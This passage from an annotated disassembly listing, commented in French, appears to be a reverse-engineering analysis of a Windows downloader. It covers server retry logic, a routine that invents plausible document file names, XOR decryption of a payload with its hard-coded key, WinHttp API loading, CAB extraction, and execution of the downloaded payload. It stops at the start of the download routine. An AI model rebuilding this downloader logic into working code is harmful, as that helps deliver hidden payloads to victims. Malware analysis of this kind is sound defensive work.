.text:0040178D 75 0A jnz short loc_401799 .text:0040178F 01 5D FC add [ebp-4], ebx ; Si on a épuisé les 5 serveurs, on s'endort quelques temps avant de ré-essayer... .text:00401792 C7 45 F4 01 00 00+ mov [ebp+var_C], 1 .text:00401799 .text:00401799 loc_401799: ; CODE XREF: start+2ADj .text:00401799 FF 75 FC push [ebp+dwMilliseconds] ; dwMilliseconds .text:0040179C FF 15 14 10 40 00 call Sleep .text:004017A2 EB B1 jmp short loc_401755 ; ...et on ré-essaye les 5 serveurs donc. .text:004017A4 ; --------------------------------------------------------------------------- .text:004017A4 .text:004017A4 loc_4017A4: ; CODE XREF: start+297j .text:004017A4 8B 45 F8 mov eax, [ebp+lpBuffer] .text:004017A7 83 C0 F8 add eax, 0FFFFFFF8h .text:004017AA 50 push eax ; nNumberOfBytesToWrite .text:004017AB 83 C6 08 add esi, 8 .text:004017AE 56 push esi ; lpBuffer .text:004017AF E8 FF 05 00 00 call executePayload ; ==> On va exécuter la charge downloadée plus haut .text:004017B4 59 pop ecx .text:004017B5 59 pop ecx .text:004017B6 E9 71 FF FF FF jmp endOfProcess ; =================> On a terminé ! .text:004017B6 start endp .text:004017B6 .text:004017BB .text:004017BB ; =============== S U B R O U T I N E ======================================= .text:004017BB .text:004017BB ; Attributes: bp-based frame .text:004017BB .text:004017BB BuildCredibleFileName proc near ; CODE XREF: start+13Ep .text:004017BB ; executePayload+16p .text:004017BB .text:004017BB var_618 = byte ptr -618h .text:004017BB var_410 = word ptr -410h .text:004017BB var_208 = word ptr -208h .text:004017BB var_1FC = word ptr -1FCh .text:004017BB arg_0 = dword ptr 8 .text:004017BB arg_4 = dword ptr 0Ch .text:004017BB arg_8 = dword ptr 10h .text:004017BB .text:004017BB 55 push ebp .text:004017BC 8B EC mov ebp, esp .text:004017BE 81 EC 18 06 00 00 sub esp, 618h .text:004017C4 53 push ebx .text:004017C5 56 push esi .text:004017C6 57 push edi .text:004017C7 68 DC 11 40 00 push offset aAeoiuy_ ; "aeoiuy." .text:004017CC BE 04 01 00 00 mov esi, 104h .text:004017D1 8D 85 F8 FD FF FF lea eax, [ebp+var_208] .text:004017D7 56 push esi .text:004017D8 50 push eax .text:004017D9 FF 15 FC 1E 40 00 call lpfwnsprintfW .text:004017DF 68 EC 11 40 00 push offset aQwrtpsdfghjklz ; "qwrtpsdfghjklzxcvbnm" .text:004017E4 8D 85 F0 FB FF FF lea eax, [ebp+var_410] .text:004017EA 56 push esi .text:004017EB 50 push eax .text:004017EC FF 15 FC 1E 40 00 call lpfwnsprintfW .text:004017F2 68 18 12 40 00 push offset aTxtrtfdocchmhl ; "txtrtfdocchmhlpttfpdffb2xlspptmdbcdawav"... .text:004017F7 8D 85 E8 F9 FF FF lea eax, [ebp+var_618] .text:004017FD 56 push esi .text:004017FE 50 push eax .text:004017FF FF 15 FC 1E 40 00 call lpfwnsprintfW .text:00401805 8B 45 0C mov eax, [ebp+arg_4] .text:00401808 6A 03 push 3 .text:0040180A E8 92 00 00 00 call randomizeEAX .text:0040180F 8B F0 mov esi, eax .text:00401811 33 FF xor edi, edi .text:00401813 83 C4 28 add esp, 28h .text:00401816 33 DB xor ebx, ebx .text:00401818 3B F7 cmp esi, edi .text:0040181A 7E 40 jle short loc_40185C .text:0040181C .text:0040181C loc_40181C: ; CODE XREF: BuildCredibleFileName+9Fj .text:0040181C 8B C3 mov eax, ebx .text:0040181E 25 01 00 00 80 and eax, 80000001h .text:00401823 79 05 jns short loc_40182A .text:00401825 48 dec eax .text:00401826 83 C8 FE or eax, 0FFFFFFFEh .text:00401829 40 inc eax .text:0040182A .text:0040182A loc_40182A: ; CODE XREF: BuildCredibleFileName+68j .text:0040182A 57 push edi .text:0040182B 74 12 jz short loc_40183F .text:0040182D 6A 05 push 5 .text:0040182F 58 pop eax .text:00401830 E8 6C 00 00 00 call randomizeEAX .text:00401835 66 8B 84 45 F8 FD+ mov ax, [ebp+eax*2+var_208] .text:0040183D EB 10 jmp short loc_40184F .text:0040183F ; --------------------------------------------------------------------------- .text:0040183F .text:0040183F loc_40183F: ; CODE XREF: BuildCredibleFileName+70j .text:0040183F 6A 13 push 13h .text:00401841 58 pop eax .text:00401842 E8 5A 00 00 00 call randomizeEAX .text:00401847 66 8B 84 45 F0 FB+ mov ax, [ebp+eax*2+var_410] .text:0040184F .text:0040184F loc_40184F: ; CODE XREF: BuildCredibleFileName+82j .text:0040184F 59 pop ecx .text:00401850 8B 4D 08 mov ecx, [ebp+arg_0] .text:00401853 66 89 04 59 mov [ecx+ebx*2], ax .text:00401857 43 inc ebx .text:00401858 3B DE cmp ebx, esi .text:0040185A 7C C0 jl short loc_40181C .text:0040185C .text:0040185C loc_40185C: ; CODE XREF: BuildCredibleFileName+5Fj .text:0040185C 66 8B 85 04 FE FF+ mov ax, [ebp+var_1FC] .text:00401863 8B 75 08 mov esi, [ebp+arg_0] .text:00401866 66 89 04 5E mov [esi+ebx*2], ax .text:0040186A 43 inc ebx .text:0040186B 83 7D 10 01 cmp [ebp+arg_8], 1 .text:0040186F 75 05 jnz short loc_401876 .text:00401871 6A 69 push 69h .text:00401873 58 pop eax .text:00401874 EB 0D jmp short loc_401883 .text:00401876 ; --------------------------------------------------------------------------- .text:00401876 .text:00401876 loc_401876: ; CODE XREF: BuildCredibleFileName+B4j .text:00401876 57 push edi .text:00401877 6A 22 push 22h .text:00401879 58 pop eax .text:0040187A E8 22 00 00 00 call randomizeEAX .text:0040187F 6B C0 03 imul eax, 3 .text:00401882 59 pop ecx .text:00401883 .text:00401883 loc_401883: ; CODE XREF: BuildCredibleFileName+B9j .text:00401883 8B 4D 08 mov ecx, [ebp+arg_0] .text:00401886 8D 3C 5E lea edi, [esi+ebx*2] .text:00401889 8D B4 45 E8 F9 FF+ lea esi, [ebp+eax*2+var_618] .text:00401890 A5 movsd .text:00401891 66 A5 movsw .text:00401893 83 C3 03 add ebx, 3 .text:00401896 5F pop edi .text:00401897 33 C0 xor eax, eax .text:00401899 5E pop esi .text:0040189A 66 89 04 59 mov [ecx+ebx*2], ax .text:0040189E 5B pop ebx .text:0040189F C9 leave .text:004018A0 C3 retn .text:004018A0 BuildCredibleFileName endp .text:004018A0 .text:004018A1 .text:004018A1 ; =============== S U B R O U T I N E ======================================= .text:004018A1 .text:004018A1 ; Attributes: bp-based frame .text:004018A1 .text:004018A1 randomizeEAX proc near ; CODE XREF: start+25Dp .text:004018A1 ; BuildCredibleFileName+4Fp ... .text:004018A1 .text:004018A1 lplNumber = dword ptr -4 .text:004018A1 arg_0 = dword ptr 8 .text:004018A1 .text:004018A1 55 push ebp .text:004018A2 8B EC mov ebp, esp .text:004018A4 51 push ecx .text:004018A5 56 push esi .text:004018A6 8B F0 mov esi, eax .text:004018A8 6A 04 push 4 .text:004018AA 8D 45 FC lea eax, [ebp+lplNumber] .text:004018AD 50 push eax .text:004018AE FF 15 04 1F 40 00 call lpfSystemFunction036 ; Garnit une zone mémoire avec des nombres aléatoires .text:004018B4 2B 75 08 sub esi, [ebp+arg_0] .text:004018B7 8B 45 FC mov eax, [ebp+lplNumber] .text:004018BA 46 inc esi .text:004018BB 33 D2 xor edx, edx .text:004018BD F7 F6 div esi .text:004018BF 5E pop esi ; On restaure ESI .text:004018C0 8B C2 mov eax, edx .text:004018C2 03 45 08 add eax, [ebp+arg_0] .text:004018C5 C9 leave .text:004018C6 C3 retn .text:004018C6 randomizeEAX endp .text:004018C6 .text:004018C7 .text:004018C7 ; =============== S U B R O U T I N E ======================================= .text:004018C7 .text:004018C7 ; ECX pointe sur le contenu downloadé, qui est chiffré .text:004018C7 .text:004018C7 dechiffreEtVerifiePayload proc near ; CODE XREF: start+290p .text:004018C7 81 F9 00 04 00 00 cmp ecx, 400h .text:004018CD 73 03 jnb short loc_4018D2 .text:004018CF 33 C0 xor eax, eax .text:004018D1 C3 retn .text:004018D2 ; --------------------------------------------------------------------------- .text:004018D2 .text:004018D2 loc_4018D2: ; CODE XREF: dechiffreEtVerifiePayload+6j .text:004018D2 53 push ebx .text:004018D3 8B 18 mov ebx, [eax] .text:004018D5 56 push esi .text:004018D6 8B 70 04 mov esi, [eax+4] .text:004018D9 83 C1 F8 add ecx, 0FFFFFFF8h .text:004018DC 3B F1 cmp esi, ecx .text:004018DE 74 04 jz short loc_4018E4 .text:004018E0 33 C0 xor eax, eax .text:004018E2 EB 1D jmp short loc_401901 .text:004018E4 ; --------------------------------------------------------------------------- .text:004018E4 .text:004018E4 loc_4018E4: ; CODE XREF: dechiffreEtVerifiePayload+17j .text:004018E4 57 push edi .text:004018E5 8D 78 08 lea edi, [eax+8] .text:004018E8 56 push esi .text:004018E9 57 push edi .text:004018EA E8 15 00 00 00 call dechiffrePayload .text:004018EF 56 push esi .text:004018F0 57 push edi .text:004018F1 E8 8A 05 00 00 call computeChecksumPayload .text:004018F6 2B C3 sub eax, ebx .text:004018F8 83 C4 10 add esp, 10h .text:004018FB F7 D8 neg eax .text:004018FD 1B C0 sbb eax, eax .text:004018FF 40 inc eax .text:00401900 5F pop edi .text:00401901 .text:00401901 loc_401901: ; CODE XREF: dechiffreEtVerifiePayload+1Bj .text:00401901 5E pop esi .text:00401902 5B pop ebx .text:00401903 C3 retn .text:00401903 dechiffreEtVerifiePayload endp .text:00401903 .text:00401904 .text:00401904 ; =============== S U B R O U T I N E ======================================= .text:00401904 .text:00401904 ; Attributes: bp-based frame .text:00401904 .text:00401904 dechiffrePayload proc near ; CODE XREF: dechiffreEtVerifiePayload+23p .text:00401904 .text:00401904 var_10 = byte ptr -10h .text:00401904 var_F = byte ptr -0Fh .text:00401904 var_E = byte ptr -0Eh .text:00401904 var_D = byte ptr -0Dh .text:00401904 var_C = byte ptr -0Ch .text:00401904 var_B = byte ptr -0Bh .text:00401904 var_A = byte ptr -0Ah .text:00401904 var_9 = byte ptr -9 .text:00401904 var_8 = byte ptr -8 .text:00401904 var_7 = byte ptr -7 .text:00401904 var_6 = byte ptr -6 .text:00401904 var_5 = byte ptr -5 .text:00401904 var_4 = byte ptr -4 .text:00401904 var_3 = byte ptr -3 .text:00401904 var_2 = byte ptr -2 .text:00401904 var_1 = byte ptr -1 .text:00401904 lpBuffer = dword ptr 8 .text:00401904 lNbBytesToDo = dword ptr 0Ch .text:00401904 .text:00401904 55 push ebp .text:00401905 8B EC mov ebp, esp .text:00401907 83 EC 10 sub esp, 10h .text:0040190A 53 push ebx .text:0040190B 57 push edi .text:0040190C 33 DB xor ebx, ebx ; int i=0; .text:0040190E 33 FF xor edi, edi ; int j=0; .text:00401910 C6 45 F0 80 mov [ebp+var_10], 80h ; char tabCles[16] = {0x80, 0x3B, 0xD3, 0x23, 0x9C, 0xE5, 0x1A, 0xBA, 0xD2, 0x93, 0x64, 0x21, 0x0B, 0xD6, 0x0B, 0x19 }; .text:00401914 C6 45 F1 3B mov [ebp+var_F], 3Bh .text:00401918 C6 45 F2 D3 mov [ebp+var_E], 0D3h .text:0040191C C6 45 F3 23 mov [ebp+var_D], 23h .text:00401920 C6 45 F4 9C mov [ebp+var_C], 9Ch .text:00401924 C6 45 F5 E5 mov [ebp+var_B], 0E5h .text:00401928 C6 45 F6 1A mov [ebp+var_A], 1Ah .text:0040192C C6 45 F7 BA mov [ebp+var_9], 0BAh .text:00401930 C6 45 F8 D2 mov [ebp+var_8], 0D2h .text:00401934 C6 45 F9 93 mov [ebp+var_7], 93h .text:00401938 C6 45 FA 64 mov [ebp+var_6], 64h .text:0040193C C6 45 FB 21 mov [ebp+var_5], 21h .text:00401940 C6 45 FC 0B mov [ebp+var_4], 0Bh .text:00401944 C6 45 FD D6 mov [ebp+var_3], 0D6h .text:00401948 C6 45 FE 0B mov [ebp+var_2], 0Bh .text:0040194C C6 45 FF 19 mov [ebp+var_1], 19h .text:00401950 39 5D 0C cmp [ebp+lNbBytesToDo], ebx .text:00401953 76 26 jbe short loc_40197B ; Si on a rien à faire, on s'en va... .text:00401955 56 push esi .text:00401956 .text:00401956 loc_401956: ; CODE XREF: dechiffrePayload+74j .text:00401956 8B 45 08 mov eax, [ebp+lpBuffer] ; while (i<lNbBytesToDo ) .text:00401959 8D 34 03 lea esi, [ebx+eax] ; { .text:00401959 ; if (j == 16) .text:00401959 ; j=0; .text:0040195C 8A 0E mov cl, [esi] ; c = lpBuffer[i]; .text:0040195E 8D 54 3D F0 lea edx, [ebp+edi+var_10] .text:00401962 8A 02 mov al, [edx] ; cle = tabCles[j]; .text:00401964 32 C8 xor cl, al ; xor c,cle .text:00401966 32 C1 xor al, cl ; xor cle,ce .text:00401968 47 inc edi ; j++; .text:00401969 88 0E mov [esi], cl ; lpBuffer[i] = c; .text:0040196B 88 02 mov [edx], al ; tabCles[j-1]=cle; .text:0040196D 83 FF 10 cmp edi, 10h ; i++; .text:0040196D ; } .text:00401970 75 02 jnz short loc_401974 ; Si on a utilisé les 16 valeurs de la liste, .text:00401972 33 FF xor edi, edi ; on remet le pointeur au début de la liste .text:00401974 .text:00401974 loc_401974: ; CODE XREF: dechiffrePayload+6Cj .text:00401974 43 inc ebx .text:00401975 3B 5D 0C cmp ebx, [ebp+lNbBytesToDo] ; On regarde si on a traité tous les octets à traiter... .text:00401978 72 DC jb short loc_401956 .text:0040197A 5E pop esi .text:0040197B .text:0040197B loc_40197B: ; CODE XREF: dechiffrePayload+4Fj .text:0040197B 5F pop edi .text:0040197C 5B pop ebx .text:0040197D .text:0040197D endProc: .text:0040197D C9 leave .text:0040197E C3 retn .text:0040197E dechiffrePayload endp .text:0040197E .text:0040197F .text:0040197F ; =============== S U B R O U T I N E ======================================= .text:0040197F .text:0040197F ; Attributes: noreturn bp-based frame .text:0040197F .text:0040197F ErrorMsgBox proc near ; CODE XREF: start:EndProcessWithErrorp .text:0040197F ; LoadUsefullLibraries:loc_401A0Ap ... .text:0040197F .text:0040197F Text = byte ptr -104h .text:0040197F lErrorCode = dword ptr 8 .text:0040197F .text:0040197F 55 push ebp .text:00401980 8B EC mov ebp, esp .text:00401982 81 EC 04 01 00 00 sub esp, 104h .text:00401988 FF 75 08 push [ebp+lErrorCode] .text:0040198B 8D 85 FC FE FF FF lea eax, [ebp+Text] .text:00401991 68 F8 12 40 00 push offset aErrorCodeD ; "Error code #%d" .text:00401996 68 04 01 00 00 push 104h .text:0040199B 50 push eax .text:0040199C FF 15 E8 1E 40 00 call lpfWnsprintfA .text:004019A2 83 C4 10 add esp, 10h .text:004019A5 6A 10 push 10h ; uType .text:004019A7 68 08 13 40 00 push offset Caption ; "Error" .text:004019AC 8D 85 FC FE FF FF lea eax, [ebp+Text] .text:004019B2 50 push eax ; lpText .text:004019B3 6A 00 push 0 ; hWnd .text:004019B5 FF 15 54 10 40 00 call MessageBoxA .text:004019BB 6A 00 push 0 ; uExitCode .text:004019BD FF 15 00 10 40 00 call ExitProcess .text:004019BD ErrorMsgBox endp .text:004019BD .text:004019BD ; --------------------------------------------------------------------------- .text:004019C3 CC align 4 .text:004019C4 .text:004019C4 ; =============== S U B R O U T I N E ======================================= .text:004019C4 .text:004019C4 .text:004019C4 LoadUsefullLibraries proc near ; CODE XREF: start+5Ap .text:004019C4 .text:004019C4 hModule = dword ptr -8 .text:004019C4 var_4 = dword ptr -4 .text:004019C4 .text:004019C4 51 push ecx .text:004019C5 51 push ecx .text:004019C6 53 push ebx .text:004019C7 55 push ebp .text:004019C8 56 push esi .text:004019C9 8B 35 38 10 40 00 mov esi, LoadLibraryA .text:004019CF 57 push edi .text:004019D0 68 10 13 40 00 push offset LibFileName ; "SHLWAPI.DLL" .text:004019D5 FF D6 call esi ; LoadLibraryA .text:004019D7 68 1C 13 40 00 push offset aSetupapi_dll ; "SETUPAPI.DLL" .text:004019DC 8B D8 mov ebx, eax .text:004019DE FF D6 call esi ; LoadLibraryA .text:004019E0 68 2C 13 40 00 push offset aShell32_dll ; "SHELL32.DLL" .text:004019E5 8B E8 mov ebp, eax .text:004019E7 FF D6 call esi ; LoadLibraryA .text:004019E9 68 38 13 40 00 push offset aWinhttp_dll ; "WINHTTP.DLL" .text:004019EE 89 44 24 14 mov [esp+1Ch+hModule], eax .text:004019F2 FF D6 call esi ; LoadLibraryA .text:004019F4 68 44 13 40 00 push offset aAdvapi32_dll ; "ADVAPI32.DLL" .text:004019F9 8B F8 mov edi, eax .text:004019FB FF D6 call esi ; LoadLibraryA .text:004019FD 89 44 24 14 mov [esp+18h+var_4], eax .text:00401A01 85 DB test ebx, ebx .text:00401A03 75 0A jnz short loc_401A0F .text:00401A05 68 B9 0B 00 00 push 0BB9h .text:00401A0A .text:00401A0A loc_401A0A: ; CODE XREF: LoadUsefullLibraries+54j .text:00401A0A ; LoadUsefullLibraries+62j ... .text:00401A0A E8 70 FF FF FF call ErrorMsgBox .text:00401A0F ; --------------------------------------------------------------------------- .text:00401A0F .text:00401A0F loc_401A0F: ; CODE XREF: LoadUsefullLibraries+3Fj .text:00401A0F 85 ED test ebp, ebp .text:00401A11 75 07 jnz short loc_401A1A .text:00401A13 68 BA 0B 00 00 push 0BBAh .text:00401A18 EB F0 jmp short loc_401A0A .text:00401A1A ; --------------------------------------------------------------------------- .text:00401A1A .text:00401A1A loc_401A1A: ; CODE XREF: LoadUsefullLibraries+4Dj .text:00401A1A 83 7C 24 10 00 cmp [esp+18h+hModule], 0 .text:00401A1F 75 07 jnz short loc_401A28 .text:00401A21 68 BB 0B 00 00 push 0BBBh .text:00401A26 EB E2 jmp short loc_401A0A .text:00401A28 ; --------------------------------------------------------------------------- .text:00401A28 .text:00401A28 loc_401A28: ; CODE XREF: LoadUsefullLibraries+5Bj .text:00401A28 85 FF test edi, edi .text:00401A2A 75 07 jnz short loc_401A33 .text:00401A2C 68 BC 0B 00 00 push 0BBCh .text:00401A31 EB D7 jmp short loc_401A0A .text:00401A33 ; --------------------------------------------------------------------------- .text:00401A33 .text:00401A33 loc_401A33: ; CODE XREF: LoadUsefullLibraries+66j .text:00401A33 8B 35 30 10 40 00 mov esi, GetProcAddress .text:00401A39 68 54 13 40 00 push offset ProcName ; "wnsprintfA" .text:00401A3E 53 push ebx ; hModule .text:00401A3F FF D6 call esi ; GetProcAddress .text:00401A41 68 60 13 40 00 push offset aWnsprintfw ; "wnsprintfW" .text:00401A46 53 push ebx ; hModule .text:00401A47 A3 E8 1E 40 00 mov lpfWnsprintfA, eax .text:00401A4C FF D6 call esi ; GetProcAddress .text:00401A4E 68 6C 13 40 00 push offset aSetupiterateca ; "SetupIterateCabinetW" .text:00401A53 55 push ebp ; hModule .text:00401A54 A3 FC 1E 40 00 mov lpfwnsprintfW, eax .text:00401A59 FF D6 call esi ; GetProcAddress .text:00401A5B 68 84 13 40 00 push offset aShellexecutew ; "ShellExecuteW" .text:00401A60 FF 74 24 14 push [esp+1Ch+hModule] ; hModule .text:00401A64 A3 F0 1E 40 00 mov lpfSetupIterateCabinetW, eax .text:00401A69 FF D6 call esi ; GetProcAddress .text:00401A6B 68 94 13 40 00 push offset aStrstriw ; "StrStrIW" .text:00401A70 53 push ebx ; hModule .text:00401A71 A3 DC 1E 40 00 mov lpfShellExecuteW, eax .text:00401A76 FF D6 call esi ; GetProcAddress .text:00401A78 68 A0 13 40 00 push offset aSystemfunction ; "SystemFunction036" .text:00401A7D FF 74 24 18 push [esp+1Ch+var_4] ; hModule .text:00401A81 A3 F4 1E 40 00 mov lpfStrStriW, eax .text:00401A86 FF D6 call esi ; GetProcAddress .text:00401A88 68 B4 13 40 00 push offset aWinhttpqueryda ; "WinHttpQueryDataAvailable" .text:00401A8D 57 push edi ; hModule .text:00401A8E A3 04 1F 40 00 mov lpfSystemFunction036, eax .text:00401A93 FF D6 call esi ; GetProcAddress .text:00401A95 68 D0 13 40 00 push offset aWinhttpreceive ; "WinHttpReceiveResponse" .text:00401A9A 57 push edi ; hModule .text:00401A9B A3 14 1F 40 00 mov lpfWinHttpQueryDataAvailable, eax .text:00401AA0 FF D6 call esi ; GetProcAddress .text:00401AA2 68 E8 13 40 00 push offset aWinhttpsendreq ; "WinHttpSendRequest" .text:00401AA7 57 push edi ; hModule .text:00401AA8 A3 08 1F 40 00 mov WinHttpReceiveResponse, eax .text:00401AAD FF D6 call esi ; GetProcAddress .text:00401AAF 68 FC 13 40 00 push offset aWinhttpsetopti ; "WinHttpSetOption" .text:00401AB4 57 push edi ; hModule .text:00401AB5 A3 E4 1E 40 00 mov WinHttpSendRequest, eax .text:00401ABA FF D6 call esi ; GetProcAddress .text:00401ABC 68 10 14 40 00 push offset aWinhttpopenreq ; "WinHttpOpenRequest" .text:00401AC1 57 push edi ; hModule .text:00401AC2 A3 18 1F 40 00 mov lpfWinHttpSetOption, eax .text:00401AC7 FF D6 call esi ; GetProcAddress .text:00401AC9 68 24 14 40 00 push offset aWinhttpconnect ; "WinHttpConnect" .text:00401ACE 57 push edi ; hModule .text:00401ACF A3 00 1F 40 00 mov lpfWinHttpOpenRequest, eax .text:00401AD4 FF D6 call esi ; GetProcAddress .text:00401AD6 68 34 14 40 00 push offset aWinhttpopen ; "WinHttpOpen" .text:00401ADB 57 push edi ; hModule .text:00401ADC A3 0C 1F 40 00 mov lpfWinHttpConnect, eax .text:00401AE1 FF D6 call esi ; GetProcAddress .text:00401AE3 68 40 14 40 00 push offset aWinhttpreaddat ; "WinHttpReadData" .text:00401AE8 57 push edi ; hModule .text:00401AE9 A3 E0 1E 40 00 mov lpfWinHttpOpen, eax .text:00401AEE FF D6 call esi ; GetProcAddress .text:00401AF0 5F pop edi .text:00401AF1 5E pop esi .text:00401AF2 5D pop ebp .text:00401AF3 A3 10 1F 40 00 mov lpfWinHttpReadData, eax .text:00401AF8 5B pop ebx .text:00401AF9 59 pop ecx .text:00401AFA 59 pop ecx .text:00401AFB C3 retn .text:00401AFB LoadUsefullLibraries endp .text:00401AFB .text:00401AFC .text:00401AFC ; =============== S U B R O U T I N E ======================================= .text:00401AFC .text:00401AFC ; La fonction de Callback de SetupIterateCabinet a le prototype suivant : .text:00401AFC ; UINT PSP_FILE_CABINET ( PVOID Context, UINT Notification, UINT_PTR Param1, UINT_PTR Param2 ); .text:00401AFC ; avec : .text:00401AFC ; Context = The context information about the queue notification that is returned to the callback function. .text:00401AFC ; Notification = The event that triggers the call to the callback function. .text:00401AFC ; Param1 = The addinotification information. The value is dependent on the notification that is being returned. .text:00401AFC ; param2 = The additional notification information. The value is dependent on the notification that is being returned. .text:00401AFC ; Attributes: bp-based frame .text:00401AFC .text:00401AFC CallBackFileCAB proc near ; DATA XREF: start+200o .text:00401AFC .text:00401AFC var_400 = word ptr -400h .text:00401AFC var_3FE = word ptr -3FEh .text:00401AFC var_3FC = word ptr -3FCh .text:00401AFC var_3FA = word ptr -3FAh .text:00401AFC arg_4 = dword ptr 0Ch .text:00401AFC arg_8 = dword ptr 10h .text:00401AFC .text:00401AFC 55 push ebp .text:00401AFD 8B EC mov ebp, esp .text:00401AFF 8B 4D 0C mov ecx, [ebp+arg_4] .text:00401B02 81 EC 00 04 00 00 sub esp, 400h .text:00401B08 33 C0 xor eax, eax .text:00401B0A 83 E9 11 sub ecx, 11h ; 0x11 = SPFILENOTIFY_FILEINCABINET .text:00401B0D 74 11 jz short loc_401B20 .text:00401B0F 49 dec ecx ; 0x10 = SPFILENOTIFY_CABINETINFO .text:00401B10 74 07 jz short loc_401B19 .text:00401B12 49 dec ecx .text:00401B13 0F 85 9A 00 00 00 jnz locret_401BB3 ; 0x0F = SPFILENOTIFY_QUEUESCAN .text:00401B19 .text:00401B19 loc_401B19: ; CODE XREF: CallBackFileCAB+14j .text:00401B19 33 C0 xor eax, eax .text:00401B1B E9 93 00 00 00 jmp locret_401BB3 .text:00401B20 ; --------------------------------------------------------------------------- .text:00401B20 .text:00401B20 loc_401B20: ; CODE XREF: CallBackFileCAB+11j .text:00401B20 56 push esi ; On a trouvé un fichier dans le .CAB... .text:00401B21 57 push edi .text:00401B22 8B 7D 10 mov edi, [ebp+arg_8] .text:00401B25 FF 37 push dword ptr [edi] ; lpString .text:00401B27 FF 15 24 10 40 00 call lstrlenW .text:00401B2D 83 F8 04 cmp eax, 4 .text:00401B30 7D 0A jge short loc_401B3C .text:00401B32 68 6C 09 00 00 push 96Ch .text:00401B37 E8 43 FE FF FF call ErrorMsgBox .text:00401B3C ; --------------------------------------------------------------------------- .text:00401B3C .text:00401B3C loc_401B3C: ; CODE XREF: CallBackFileCAB+34j .text:00401B3C 8B 0F mov ecx, [edi] .text:00401B3E 66 8B 54 41 FA mov dx, [ecx+eax*2-6] .text:00401B43 66 89 95 00 FC FF+ mov [ebp+var_400], dx .text:00401B4A 66 8B 54 41 FC mov dx, [ecx+eax*2-4] .text:00401B4F 66 89 95 02 FC FF+ mov [ebp+var_3FE], dx .text:00401B56 66 8B 44 41 FE mov ax, [ecx+eax*2-2] .text:00401B5B 66 89 85 04 FC FF+ mov [ebp+var_3FC], ax .text:00401B62 33 C0 xor eax, eax .text:00401B64 66 89 85 06 FC FF+ mov [ebp+var_3FA], ax .text:00401B6B 8D 85 00 FC FF FF lea eax, [ebp+var_400] .text:00401B71 50 push eax .text:00401B72 FF 35 F8 1E 40 00 push lpMemBlock1 .text:00401B78 BE 00 02 00 00 mov esi, 200h .text:00401B7D FF 35 D8 1E 40 00 push lpMemBlock2 .text:00401B83 68 50 14 40 00 push offset aSS_S ; "%s%s.%s" .text:00401B88 56 push esi .text:00401B89 FF 35 EC 1E 40 00 push lpMemBlock3 .text:00401B8F FF 15 FC 1E 40 00 call lpfwnsprintfW .text:00401B95 FF 35 EC 1E 40 00 push lpMemBlock3 .text:00401B9B 83 C7 12 add edi, 12h .text:00401B9E 68 60 14 40 00 push offset aS ; "%s" .text:00401BA3 56 push esi .text:00401BA4 57 push edi .text:00401BA5 FF 15 FC 1E 40 00 call lpfwnsprintfW .text:00401BAB 83 C4 28 add esp, 28h .text:00401BAE 33 C0 xor eax, eax .text:00401BB0 5F pop edi .text:00401BB1 40 inc eax .text:00401BB2 5E pop esi .text:00401BB3 .text:00401BB3 locret_401BB3: ; CODE XREF: CallBackFileCAB+17j .text:00401BB3 ; CallBackFileCAB+1Fj .text:00401BB3 C9 leave .text:00401BB4 C2 10 00 retn 10h .text:00401BB4 CallBackFileCAB endp .text:00401BB4 .text:00401BB7 .text:00401BB7 ; =============== S U B R O U T I N E ======================================= .text:00401BB7 .text:00401BB7 ; EAX = pointeur sur nom complet du fichier en cours d'exécution .text:00401BB7 .text:00401BB7 sub_401BB7 proc near ; CODE XREF: start+1ECp .text:00401BB7 53 push ebx .text:00401BB8 56 push esi .text:00401BB9 8B 35 F8 1E 40 00 mov esi, lpMemBlock1 .text:00401BBF 8B D8 mov ebx, eax .text:00401BC1 33 C0 xor eax, eax .text:00401BC3 57 push edi .text:00401BC4 8B D1 mov edx, ecx .text:00401BC6 85 C9 test ecx, ecx .text:00401BC8 7E 0F jle short loc_401BD9 .text:00401BCA .text:00401BCA loc_401BCA: ; CODE XREF: sub_401BB7+1Dj .text:00401BCA 66 83 3C 53 5C cmp word ptr [ebx+edx*2], 5Ch ; On va isoler le nom du fichier en partant de la fin et en cherchant le premier '\' .text:00401BCF 74 07 jz short loc_401BD8 .text:00401BD1 4A dec edx .text:00401BD2 85 D2 test edx, edx .text:00401BD4 7F F4 jg short loc_401BCA .text:00401BD6 EB 01 jmp short loc_401BD9 .text:00401BD8 ; --------------------------------------------------------------------------- .text:00401BD8 .text:00401BD8 loc_401BD8: ; CODE XREF: sub_401BB7+18j .text:00401BD8 42 inc edx .text:00401BD9 .text:00401BD9 loc_401BD9: ; CODE XREF: sub_401BB7+11j .text:00401BD9 ; sub_401BB7+1Fj .text:00401BD9 2B CA sub ecx, edx .text:00401BDB 8D 79 FC lea edi, [ecx-4] ; On enlève l'extension du fichier. EDI = longueur du nom du fichier sans l'extension .text:00401BDE 83 FF 01 cmp edi, 1 .text:00401BE1 7D 04 jge short loc_401BE7 .text:00401BE3 33 C0 xor eax, eax .text:00401BE5 EB 22 jmp short loc_401C09 .text:00401BE7 ; --------------------------------------------------------------------------- .text:00401BE7 .text:00401BE7 loc_401BE7: ; CODE XREF: sub_401BB7+2Aj .text:00401BE7 33 C9 xor ecx, ecx .text:00401BE9 85 FF test edi, edi .text:00401BEB 7E 1C jle short loc_401C09 .text:00401BED 8D 14 53 lea edx, [ebx+edx*2] ; EDX va pointer sur le nom du fichier avec l'extension .text:00401BF0 .text:00401BF0 loc_401BF0: ; CODE XREF: sub_401BB7+45j .text:00401BF0 66 8B 1A mov bx, [edx] ; On extrait le nom du fichier sans l'extension qui sera pointé par ESI .text:00401BF3 66 89 1C 4E mov [esi+ecx*2], bx .text:00401BF7 41 inc ecx .text:00401BF8 42 inc edx .text:00401BF9 42 inc edx .text:00401BFA 3B CF cmp ecx, edi .text:00401BFC 7C F2 jl short loc_401BF0 .text:00401BFE 85 C9 test ecx, ecx .text:00401C00 7E 07 jle short loc_401C09 .text:00401C02 33 C0 xor eax, eax .text:00401C04 66 89 04 4E mov [esi+ecx*2], ax ; On termine par un \0 .text:00401C08 40 inc eax .text:00401C09 .text:00401C09 loc_401C09: ; CODE XREF: sub_401BB7+2Ej .text:00401C09 ; sub_401BB7+34j ... .text:00401C09 5F pop edi .text:00401C0A 5E pop esi .text:00401C0B 5B pop ebx .text:00401C0C C3 retn .text:00401C0C sub_401BB7 endp .text:00401C0C .text:00401C0D .text:00401C0D ; =============== S U B R O U T I N E ======================================= .text:00401C0D .text:00401C0D ; Variables locales : .text:00401C0D ; hRequest = handle de la requete HTTP .text:00401C0D ; lpAddress = adresse du buffer de lecture des données renvoyées par le GET .text:00401C0D ; Attributes: bp-based frame .text:00401C0D .text:00401C0D ; int __cdecl downloadPayload(LPCWSTR lpString, int) .text:00401C0D 